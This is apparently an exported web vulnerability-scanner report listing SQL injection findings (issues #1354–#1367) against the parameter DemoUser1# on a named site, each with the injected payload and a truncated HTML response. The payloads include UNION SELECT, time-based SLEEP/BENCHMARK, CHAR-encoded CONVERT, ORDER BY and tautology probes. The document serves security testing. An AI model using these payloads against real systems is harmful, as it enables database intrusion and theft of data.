src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1354\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# WHERE 1=1 AND 1=0--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1355\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR 1=0--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1356\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1357\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1358\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1359\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 15--ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1360\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1361Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1362\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1' GROUP BY 1,2,3--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1363\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1=0 AND '%'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1364\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=\ndevice-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/\nhead/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> \nwindow.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start \nof Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://\nstatic.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> \n</script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <\nlink rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbW\nFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIo\nqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary hints\non your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1365\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1*56\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1366\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" or \"\"&\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1367\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),4\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 